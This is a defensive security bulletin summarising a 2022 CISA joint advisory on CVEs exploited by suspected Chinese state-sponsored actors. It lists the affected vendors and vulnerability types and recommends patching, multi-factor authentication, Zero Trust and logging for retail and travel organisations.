On October 6, 2022, CISA released a joint advisory advising telecommunications, defense, and critical infrastructure organizations to patch and mitigate the most prevalent Common Vulnerabilities and Exposures (CVEs) leveraged by suspected Chinese state-sponsored cyber threat actors since 2020.
Context
According to the report, “PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.
PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.
CVEs
The joint report provided the following vulnerabilities most often leveraged by Chinese state-sponsored threat actors since 2020:
| Vendor | CVE | Vulnerability Type |
| Apache Log4j | CVE-2021-44228 | Remote Code Execution |
| Pulse Connect Secure | CVE-2019-11510 | Arbitrary File Read |
| GitLab CE/EE | CVE-2021-22205 | Remote Code Execution |
| Atlassian | CVE-2022-26134 | Remote Code Execution |
| Microsoft Exchange | CVE-2021-26855 | Remote Code Execution |
| F5 Big-IP | CVE-2020-5902 | Remote Code Execution |
| VMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload |
| Citrix ADC | CVE-2019-19781 | Path Traversal |
| Cisco Hyperflex | CVE-2021-1497 | Command Line Execution |
| Buffalo WSR | CVE-2021-20090 | Relative Path Traversal |
| Atlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution |
| Hikvision Webserver | CVE-2021-36260 | Command Injection |
| Sitecore XP | CVE-2021-42237 | Remote Code Execution |
| F5 Big-IP | CVE-2022-1388 | Remote Code Execution |
| Apache | CVE-2022-24112 | Authentication Bypass by Spoofing |
| ZOHO | CVE-2021-40539 | Remote Code Execution |
| Microsoft | CVE-2021-26857 | Remote Code Execution |
| Microsoft | CVE-2021-26858 | Remote Code Execution |
| Microsoft | CVE-2021-27065 | Remote Code Execution |
| Apache HTTP Server | CVE-2021-41773 | Path Traversal |
Community Impact:
Many retail, hospitality, and travel organizations either overlap or engage with the sectors highlighted by the joint advisory (telecommunications, defense, and critical infrastructure). These include, but are not limited to food retailers and distributors, manufacturers and wholesalers, and airlines. As such, organizations are advised to implement the mitigation options provided in the report where possible and to develop compensating defensive measures where the mitigation options are not feasible.
Mitigation Options
The joint report provided the following recommendations:
- Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
- Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised.
- Block obsolete or unused protocols at the network edge.
- Upgrade or replace end-of-life devices.
- Move toward the Zero Trust security model.
- Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
